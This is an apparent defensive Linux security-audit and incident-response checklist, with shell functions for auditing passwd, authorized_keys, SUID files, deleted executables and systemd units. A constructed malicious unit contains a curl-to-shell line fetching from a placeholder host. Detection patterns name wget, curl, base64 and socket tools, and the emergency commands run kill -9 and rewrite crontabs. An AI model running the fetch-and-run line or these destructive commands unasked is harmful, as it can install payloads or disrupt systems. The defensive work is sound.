Security Assessment Checklist: Essential Commands for Linux System Analysis

Security assessment checklist with essential Linux commands for system analysis, threat detection, and security auditing during emergency response.

Fizyonops Team

User Account Security

cat /etc/passwd | grep -E "sh$|bash$"          # List users with shell access
grep -E "^[^:]*:[^:]*:0:" /etc/passwd          # Find users with UID 0 (root privileges)
last | head -20                                # Show recent login history
lastb | head -20                               # Show failed login attempts
who                                            # Show currently logged in users
w                                              # Show who is logged on and what they're doing
id                                             # Show current user ID and groups
groups                                         # List groups for current user
sudo -l                                        # List sudo privileges for current user
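
The UID-0 and login-shell checks above can be done in one awk pass that also catches what a single grep misses: duplicate UIDs, malformed lines and empty password fields. This is an added example, not part of the original checklist; the functions audit_passwd and sample_passwd and the account names in the sample are constructed for illustration.

```shell
# Added example (not from the original checklist): audit a passwd-format file
# for accounts with a login shell, extra UID-0 accounts, duplicate UIDs and
# empty password fields. Reads the file given as $1 ("-" = stdin), defaulting
# to /etc/passwd. One finding per line, sorted.
audit_passwd() {
    awk -F: '
        /^[[:space:]]*$/ || /^#/ { next }                 # skip blanks and comments
        NF != 7 { printf "MALFORMED line %d: %s\n", NR, $0; next }
        $3 == 0 && $1 != "root" { printf "UID0 %s shell=%s\n", $1, $7 }
        $2 == "" { printf "NOPASS %s\n", $1 }             # empty field: no password needed when shadow is bypassed
        $7 ~ /sh$/ { printf "SHELL %s %s\n", $1, $7 }     # same test as grep -E "sh$|bash$"
        { count[$3]++; names[$3] = names[$3] " " $1 }
        END {
            for (u in count)
                if (count[u] > 1) printf "DUPUID %s:%s\n", u, names[u]
        }' "${1:-/etc/passwd}" | sort
}

# Constructed sample resembling a Debian-style /etc/passwd with two planted
# problems: a second UID-0 account and an account with an empty password field.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup_svc:x:0:0::/var/tmp:/bin/sh
guest::1001:1001::/home/guest:/usr/sbin/nologin
EOF
}

# Demo on the constructed sample; run "audit_passwd" with no argument to
# check the live /etc/passwd instead.
sample_passwd | audit_passwd -
```

On the sample this reports the planted backup_svc account as UID0 and as a duplicate of UID 0, the guest account as NOPASS, and three SHELL accounts (root, alice, backup_svc).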

SSH Security Assessment

cat ~/.ssh/authorized_keys                     # Check SSH keys for current user
cat /root/.ssh/authorized_keys                 # Check SSH keys for root (if accessible)
find /home -name "authorized_keys" -print -exec cat {} \;  # Find all SSH authorized_keys files (print the path before each file's contents)
ss -tlnp | grep :22                           # Check SSH service status and port
cat /etc/ssh/sshd_config | grep -E "PermitRoot|PasswordAuth|PubkeyAuth"  # Review SSH configuration (sshd -T prints the effective merged config, including files pulled in via Include)
journalctl -u ssh | tail -50                  # Check SSH service logs (the unit is named sshd on RHEL-family systems)
grep "Failed password" /var/log/auth.log | tail -20  # Find recent failed SSH attempts
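
Reading authorized_keys with cat shows the lines but not what matters in them: key options such as a forced command= (a common way to hide what a key does), keys without a comment, and the same key planted twice under different names. This added example is not part of the original checklist; audit_authorized_keys, sample_authorized_keys and the key blobs in the sample are constructed for illustration, and the key-type list is OpenSSH's current set.

```shell
# Added example (not from the original checklist): audit an authorized_keys
# file. Reads $1 ("-" = stdin). Reports each key's type and comment, any
# options in front of the key (command=, from=, environment=, ...), forced
# commands, lines that do not parse, and keys that appear more than once.
audit_authorized_keys() {
    awk '
        /^[[:space:]]*$/ || /^[[:space:]]*#/ { next }
        {
            # locate "<keytype> <base64 blob>"; anything before it is options
            if (!match($0, /(^|[ \t])(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp(256|384|521)|sk-(ssh-ed25519|ecdsa-sha2-nistp256)@openssh\.com)[ \t]+AAAA[A-Za-z0-9+\/=]+/)) {
                printf "UNPARSED %d %s\n", NR, $0; next
            }
            opts    = substr($0, 1, RSTART - 1)
            keyf    = substr($0, RSTART, RLENGTH)
            comment = substr($0, RSTART + RLENGTH)
            gsub(/^[ \t]+|[ \t]+$/, "", opts)
            gsub(/^[ \t]+|[ \t]+$/, "", keyf)
            gsub(/^[ \t]+|[ \t]+$/, "", comment)
            split(keyf, kf, /[ \t]+/)                       # kf[1] = type, kf[2] = blob
            printf "KEY %d %s %s\n", NR, kf[1], (comment == "" ? "(no comment)" : comment)
            if (opts != "") {
                printf "OPTIONS %d %s\n", NR, opts
                if (opts ~ /(^|,)command=/) printf "FORCED_COMMAND %d\n", NR
            }
            if (kf[2] in seen) printf "DUPLICATE %d same key as line %d\n", NR, seen[kf[2]]
            else seen[kf[2]] = NR
        }' "${1:--}"
}

# Constructed sample: the blobs are not real keys. Line 3 has no comment,
# line 4 carries a forced command, line 5 repeats line 2's key under a new
# name, and line 6 is junk.
sample_authorized_keys() {
    cat <<'EOF'
# admin workstation
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTEDKEYBLOBAAAAAAAAAAAAAAAAAAAAAAAAA alice@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCONSTRUCTEDRSABLOBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
command="/usr/bin/rrsync /srv/backup",no-pty,no-port-forwarding ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBACKUPCONSTRUCTEDBLOBAAAAAAAAAAAAAAAAAAAAAAA backup@nas
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTEDKEYBLOBAAAAAAAAAAAAAAAAAAAAAAAAA deploy
not a key line at all
EOF
}

# Demo on the constructed sample; pass a real path (e.g. ~/.ssh/authorized_keys) instead.
sample_authorized_keys | audit_authorized_keys -
```

A forced command is not wrong in itself (the rrsync line is a normal backup setup); the point of listing them is that every one should be explainable, and a duplicate blob under a different comment usually is not.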

Process and Service Analysis

ps aux --sort=-%cpu | head -20                # Show processes by CPU usage
ps aux --sort=-%mem | head -20                # Show processes by memory usage
ps aux | grep -E "(crypto|mine|xmr|diicot|b4nd1d0)"  # Look for cryptocurrency mining processes
pstree -p                                     # Show process tree with PIDs
top -n 1 -b | head -20                        # Get system snapshot
systemctl list-units --type=service --state=running  # List running services
systemctl list-units --type=service --state=failed   # List failed services
systemctl status                              # Overall system status

Network Security Check

ss -tulnp                                     # Show listening ports and processes
netstat -tulnp                                # Alternative way to show network connections
ss -tp                                        # Show established TCP connections
lsof -i                                       # Show files opened by network connections
iptables -L -n                                # List firewall rules (if using iptables)
ufw status                                    # Check UFW firewall status
cat /etc/hosts | grep -v "^#"                 # Check hosts file for suspicious entries
nmap localhost                                # Scan local ports (if nmap available)

File System Security

find / -type f -perm -4000 2>/dev/null        # Find SUID files
find / -type f -perm -2000 2>/dev/null        # Find SGID files
find /tmp -type f -name ".*" 2>/dev/null      # Find hidden files in /tmp
find /var/tmp -type f -name ".*" 2>/dev/null  # Find hidden files in /var/tmp
lsattr /var/tmp/* 2>/dev/null | grep "^....i" # Find files with immutable attribute
ls -la /tmp /var/tmp /dev/shm                 # Check temporary directories
find / -name "*.elf" -o -name "*miner*" -o -name "*crypto*" 2>/dev/null  # Look for mining binaries
df -h                                         # Check disk usage
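
A bare list of SUID/SGID files is only useful if you know what the list looked like before; the practical check is a diff against a baseline saved from a known-good system. This is an added example, not part of the original checklist; list_suid, suid_diff, make_sample_tree and the file names in the sample tree are constructed, and the baseline is assumed to have been written by list_suid against the same root.

```shell
# Added example (not from the original checklist): list setuid/setgid files
# under a root (default /) and compare against a saved baseline, printing
# only what is NEW or REMOVED. -xdev keeps find on one filesystem.
list_suid() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# $1 = root to scan, $2 = baseline file (one path per line, as list_suid prints it)
suid_diff() {
    tmp=$(mktemp)
    list_suid "$1" > "$tmp"
    # comm -3: lines only in the baseline are unindented, lines only in the
    # current scan are tab-indented; label each accordingly
    sort "$2" | comm -3 - "$tmp" | awk -F'\t' 'NF == 2 { print "NEW " $2; next } { print "REMOVED " $0 }'
    rm -f "$tmp"
}

# Constructed sample tree: two expected SUID/SGID binaries, one plain binary,
# and a planted setuid helper hidden in /var/tmp.
make_sample_tree() {
    mkdir -p "$1/usr/bin" "$1/var/tmp"
    : > "$1/usr/bin/passwd";  chmod 4755 "$1/usr/bin/passwd"
    : > "$1/usr/bin/wall";    chmod 2755 "$1/usr/bin/wall"
    : > "$1/usr/bin/ls";      chmod 0755 "$1/usr/bin/ls"
    : > "$1/var/tmp/.helper"; chmod 4755 "$1/var/tmp/.helper"
}

# Demo: baseline knows passwd and wall plus one binary that no longer exists.
d=$(mktemp -d)
make_sample_tree "$d"
printf '%s\n' "$d/usr/bin/old_suid" "$d/usr/bin/passwd" "$d/usr/bin/wall" > "$d/baseline"
suid_diff "$d" "$d/baseline"
rm -rf "$d"
```

For a live host, save `list_suid / > /var/lib/suid.baseline` at build time (and keep a copy off-box) and run `suid_diff / /var/lib/suid.baseline` during triage.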

Scheduled Tasks and Automation

crontab -l                                    # Show current user's cron jobs
sudo crontab -l                               # Show root's cron jobs
cat /etc/crontab                              # Check system-wide cron jobs
ls -la /etc/cron.d/                          # List cron.d directory contents
ls -la /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/ /etc/cron.monthly/  # Check cron directories
systemctl list-timers                         # Show systemd timers
at -l                                         # List scheduled at jobs

System Logs Analysis

journalctl --since "1 hour ago" | grep -i error     # Recent error messages
journalctl --since "1 hour ago" | grep -i fail      # Recent failure messages
tail -50 /var/log/syslog                      # Check system log
tail -50 /var/log/auth.log                    # Check authentication log
dmesg | grep -i error                         # Check kernel messages for errors
grep -i "sudo" /var/log/auth.log | tail -20   # Recent sudo usage
lastlog | grep -v "Never"                     # Show last login times for all users

Package and Software Security

dpkg -l | grep -E "(crypto|mine|xmr)"         # Look for suspicious packages (Debian/Ubuntu)
rpm -qa | grep -E "(crypto|mine|xmr)"         # Look for suspicious packages (RHEL/CentOS)
apt list --installed | grep -E "(crypto|mine|xmr)"  # Alternative package check
which wget curl                               # Check if download tools are available
ls -la /usr/bin/ | grep -E "(ssh|sshd)"      # Look for suspicious SSH-related binaries
find /usr/bin /usr/sbin -name ".*" 2>/dev/null  # Find hidden binaries

Rootkit and Malware Detection

rkhunter --check --skip-keypress             # Run rootkit hunter (if installed)
chkrootkit                                    # Run chkrootkit scanner (if installed)
find / -name "core" -type f 2>/dev/null      # Look for core dumps
lsmod | awk 'NR>1 {print $1}' | while read -r m; do modinfo -n "$m" >/dev/null 2>&1 || echo "no module file on disk: $m"; done  # Flag loaded modules with no backing file under /lib/modules (lsmod output carries no "suspicious" label to grep for)
cat /proc/modules                            # List all loaded modules

Network Configuration

cat /etc/resolv.conf                          # Check DNS configuration
ip route show                                # Show routing table
ip addr show                                 # Show network interfaces
cat /etc/network/interfaces                  # Check network configuration (Debian/Ubuntu)
systemctl status systemd-resolved            # Check DNS resolver status
resolvectl status                            # Show DNS resolver status

Quick Security Summary Commands

# One-liner system overview
ps aux --sort=-%cpu | head -5; ss -tlnp | grep -E ":(22|80|443|3389)"; crontab -l; last | head -5

# Quick malware check
ps aux | grep -E "(crypto|mine|xmr|diicot|Opera)" | grep -v grep; find /tmp /var/tmp -name ".*" -type f 2>/dev/null

# Essential security files check
ls -la ~/.ssh/authorized_keys /root/.ssh/authorized_keys /etc/passwd /etc/shadow 2>/dev/null

# Network security overview
ss -tulnp | grep -E ":(4444|3333|5555|7777|8080)"; cat /etc/hosts | grep -v "^#\|^$"

Common Hacker Hiding Places

# Web application directories - common webshell locations
find /var/www -name "*.php" -exec grep -l "eval\|system\|exec\|shell_exec" {} \; 2>/dev/null
find /var/www -name "*.jsp" -o -name "*.aspx" -o -name "*.cgi" 2>/dev/null
ls -la /var/www/html/ /usr/share/nginx/html/ /opt/lampp/htdocs/ 2>/dev/null
find /var/www \( -name "*.txt" -o -name "*.log" \) -exec file {} \; 2>/dev/null | grep -i script

# Configuration and profile files - persistence mechanisms
cat ~/.bashrc ~/.bash_profile ~/.profile ~/.zshrc 2>/dev/null | grep -E "(wget|curl|base64|eval)"
cat /root/.bashrc /root/.bash_profile /root/.profile 2>/dev/null | grep -E "(wget|curl|base64|eval)"
find /home \( -name ".bashrc" -o -name ".profile" -o -name ".bash_profile" \) -exec grep -l "wget\|curl\|base64" {} \; 2>/dev/null
cat /etc/bash.bashrc /etc/profile 2>/dev/null | grep -E "(wget|curl|base64|eval)"

# Library directories - LD_PRELOAD attacks and backdoors
ls -la /lib/x86_64-linux-gnu/ /usr/lib/x86_64-linux-gnu/ | grep -E "\.so\.[0-9]+$" | tail -20
find /lib /usr/lib -name "*.so*" -newer /etc/passwd 2>/dev/null
ldd /bin/bash | grep -v "^\\s*/"
cat /etc/ld.so.preload 2>/dev/null

# Kernel module backdoors
lsmod | head -20
find /lib/modules/$(uname -r) -name "*.ko" -newer /etc/passwd 2>/dev/null
for m in $(lsmod | awk 'NR>1 {print $1}'); do printf '%s\t%s\n' "$m" "$(modinfo -F filename "$m" 2>/dev/null)"; done

# Process memory and environment
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -E "(HISTFILE|PATH|LD_)" | head -20
ls -la /proc/*/fd/ 2>/dev/null | grep -E "(socket|pipe|deleted)" | head -10
grep -l "(deleted)" /proc/[0-9]*/maps 2>/dev/null

# Binary modifications and rootkits
find /bin /sbin /usr/bin /usr/sbin -type f -newer /etc/passwd 2>/dev/null
ls -la /bin/sh /bin/bash /usr/bin/sudo /usr/bin/su | grep -v "^l"
strings /bin/bash | grep -E "(backdoor|rootkit|hidden)" 2>/dev/null
stat /bin/bash /bin/sh /usr/bin/sudo | grep -E "^(Modify|Change):"

# Hidden directories and files
find / -type d -name ".*" ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -20
find /usr -type d -name ".*" 2>/dev/null
find /opt -type d -name ".*" 2>/dev/null
find /var -type d -name ".*" 2>/dev/null

# Application-specific hiding spots
find /var/spool -type f -name ".*" 2>/dev/null
find /var/cache -type f -name ".*" 2>/dev/null
ls -la /var/backups/ /var/mail/ /var/spool/ 2>/dev/null
find /usr/share -type f -executable 2>/dev/null | head -10

# Database and log tampering
find /var/log -name "*.log" -size 0 2>/dev/null
find /var/log -name "*.log" -mtime -1 -exec ls -la {} \; 2>/dev/null
tail -5 /var/log/wtmp /var/log/btmp 2>/dev/null
lastlog | grep -E "(Never logged in|root|admin)" | head -10

# Memory-only attacks detection
ps aux | awk '{print $2}' | while read pid; do [ -d "/proc/$pid" ] && ls -la "/proc/$pid/fd/" 2>/dev/null | grep -E "(socket|pipe)" | head -2; done | head -20
netstat -anp | grep -E "ESTABLISHED|LISTEN" | grep -v "127.0.0.1" | head -15
ss -tulpn | grep -v "127.0.0.1" | head -15
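
The fd and socket listings above catch a process that is talking, but a fileless or self-deleting payload is better found from /proc/<pid>/exe: the link still names the unlinked path (with " (deleted)" appended) or a memfd. This is an added example, not part of the original checklist; find_deleted_exe and make_sample_proc are constructed, and the proc root is a parameter so the function can be exercised against a fake tree.

```shell
# Added example (not from the original checklist): list processes whose
# executable was unlinked after start, is memfd-backed, or lives in a tmp
# location, by reading the /proc/<pid>/exe symlink. $1 = proc root
# (default /proc).
find_deleted_exe() {
    procroot="${1:-/proc}"
    for p in "$procroot"/[0-9]*; do
        [ -d "$p" ] || continue
        pid="${p##*/}"
        exe=$(readlink "$p/exe" 2>/dev/null) || continue   # unreadable (no privilege) or kernel thread
        case "$exe" in
            *" (deleted)"|/memfd:*|/dev/shm/*|/tmp/*|/var/tmp/*)
                comm=$(cat "$p/comm" 2>/dev/null || true)
                printf '%s %s %s\n' "$pid" "${comm:-?}" "$exe"
                ;;
        esac
    done
}

# Constructed fake proc tree under $1: one clean process, one whose binary was
# unlinked after launch, one memfd-backed executable, plus a non-PID entry.
make_sample_proc() {
    mkdir -p "$1/123" "$1/456" "$1/789" "$1/self"
    ln -s /usr/bin/sleep "$1/123/exe";              echo sleep   > "$1/123/comm"
    ln -s "/tmp/.x (deleted)" "$1/456/exe";         echo x       > "$1/456/comm"
    ln -s "/memfd:payload (deleted)" "$1/789/exe";  echo payload > "$1/789/comm"
}

# Demo on the constructed tree; call find_deleted_exe with no argument for the live system.
d=$(mktemp -d)
make_sample_proc "$d"
find_deleted_exe "$d"
rm -rf "$d"
```

Run it as root on the live system; for other users' processes readlink on exe fails with EACCES and those PIDs are silently skipped, which is why the demo uses a tree it owns.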

Advanced Persistence Detection

# Systemd service backdoors
find /etc/systemd/system /lib/systemd/system -name "*.service" -exec grep -l "ExecStart.*tmp\|ExecStart.*var" {} \; 2>/dev/null
systemctl list-unit-files | grep -E "(enabled|static)" | grep -v "@" | head -20
find /etc/systemd/system -name "*.service" -newer /etc/passwd 2>/dev/null
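
The grep for ExecStart lines mentioning tmp or var above matches on the raw text and so also hits harmless paths like /var/lib. Parsing the Exec* value, stripping systemd's prefix characters and testing the executable path and the command line separately gives fewer false positives. This is an added example, not part of the original checklist; audit_units and make_sample_units, the unit names and the placeholder URL in the sample are constructed.

```shell
# Added example (not from the original checklist): scan systemd unit files for
# Exec* lines whose executable sits in a volatile or user-writable location,
# or whose command line contains download-and-run helpers. Arguments are
# directories to search (default: the three standard unit directories).
# Output: "<file>: <reason> <line>".
audit_units() {
    [ $# -gt 0 ] || set -- /etc/systemd/system /run/systemd/system /lib/systemd/system
    find "$@" -type f -name "*.service" -exec awk '
        /^Exec(Start|StartPre|StartPost|Reload|Stop|StopPost|Condition)=/ {
            v = $0
            sub(/^[^=]*=[ \t]*/, "", v)
            sub(/^[-@+!]+/, "", v)                    # strip systemd prefix chars (-, @, +, !, !!)
            split(v, a, /[ \t]+/)                     # a[1] = executable path
            if (a[1] ~ /^\/(tmp|var\/tmp|dev\/shm|home|root)\//) {
                printf "%s: SUSPICIOUS_PATH %s\n", FILENAME, $0; next
            }
            if (v ~ /(curl|wget|base64|python[0-9.]* +-c|perl +-e|\| *(ba)?sh)/) {
                printf "%s: SUSPICIOUS_CMD %s\n", FILENAME, $0
            }
        }' {} + 2>/dev/null
}

# Constructed sample units in $1: one ordinary daemon and one "update" unit
# that fetches a script from a placeholder host and runs a binary from /var/tmp.
make_sample_units() {
    cat > "$1/rsync.service" <<'EOF'
[Unit]
Description=fast remote file copy program daemon
[Service]
ExecStart=/usr/bin/rsync --daemon --no-detach
EOF
    cat > "$1/sysupdate.service" <<'EOF'
[Unit]
Description=System update
[Service]
ExecStartPre=-/bin/sh -c "curl -fsSL http://placeholder.invalid/stage | sh"
ExecStart=/var/tmp/.cache/update --quiet
EOF
}

# Demo on the constructed units; call audit_units with no arguments for the live system.
d=$(mktemp -d)
make_sample_units "$d"
audit_units "$d"
rm -rf "$d"
```

Pair the output with `systemctl list-unit-files --state=enabled` so that a flagged unit that is also enabled is triaged first.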

# Init system backdoors
ls -la /etc/init.d/ | grep -E "^-.*x.*x"
find /etc/init.d -type f -newer /etc/passwd 2>/dev/null
cat /etc/inittab 2>/dev/null | grep -v "^#"

# Scheduled task hiding places
find /var/spool/cron -type f 2>/dev/null
ls -la /var/spool/anacron/ 2>/dev/null
cat /etc/anacrontab 2>/dev/null
find /etc -name "*cron*" -type f 2>/dev/null

# Network service backdoors
find /etc/xinetd.d -type f 2>/dev/null
cat /etc/inetd.conf 2>/dev/null | grep -v "^#"
ls -la /etc/systemd/system/multi-user.target.wants/ | grep -E "(network|ssh|http)"

# Container and virtualization backdoors
docker ps -a 2>/dev/null
docker images 2>/dev/null | grep -E "(latest|none)"
ls -la /var/lib/docker/ 2>/dev/null
find /var/lib/lxc /var/lib/lxd -type f 2>/dev/null

# Firmware and bootloader
dmesg | grep -i -E "(firmware|microcode|boot)" | head -10
ls -la /boot/ | grep -E "vmlinuz|initrd" | head -5
cat /proc/cmdline

# Network configuration tampering
cat /etc/hosts | grep -v "^#" | grep -v "^$"
find /etc/network -name "*.conf" -o -name "interfaces*" 2>/dev/null
cat /etc/systemd/resolved.conf 2>/dev/null | grep -v "^#"

Emergency Response Commands

# Kill suspicious processes immediately (pkill takes an extended regex, so alternatives use a bare "|"; a "\|" would only match a literal pipe; note that short patterns like "mine" also match unrelated command lines)
pkill -f "crypto|mine|xmr|diicot|b4nd1d0"

# Check for immediate threats
ps aux | grep -E "(Opera|diicot|b4nd1d0|cache|xmrig)" | grep -v grep

# Quick file cleanup check
find /var/tmp /tmp -name ".*" -type f | grep -E "(diicot|b4nd1d0|crypto)"

# Emergency cron cleanup (rewrites the user's crontab in place; save a copy with crontab -l first)
crontab -l | grep -v "diicot\|b4nd1d0\|Documents" | crontab -

# SSH key emergency check
grep -E "(ElPatrono1337|id_rsa_free)" ~/.ssh/authorized_keys /root/.ssh/authorized_keys 2>/dev/null

# Emergency process and network isolation (same extended-regex rule as pkill above; the first line kills any wget, so expect collateral on a host that uses it legitimately)
pkill -9 -f "wget|curl.*base64|python.*socket|perl.*socket"
iptables -A OUTPUT -p tcp --dport 4444 -j DROP 2>/dev/null
iptables -A OUTPUT -p tcp --dport 3333 -j DROP 2>/dev/null
netstat -anp | grep -E "ESTABLISHED.*:4444|ESTABLISHED.*:3333" | awk '{print $7}' | cut -d'/' -f1 | xargs -r kill -9 2>/dev/null

This security assessment checklist provides essential Linux commands for system analysis, threat detection, and security auditing. Use these commands systematically to identify potential security issues and maintain system integrity.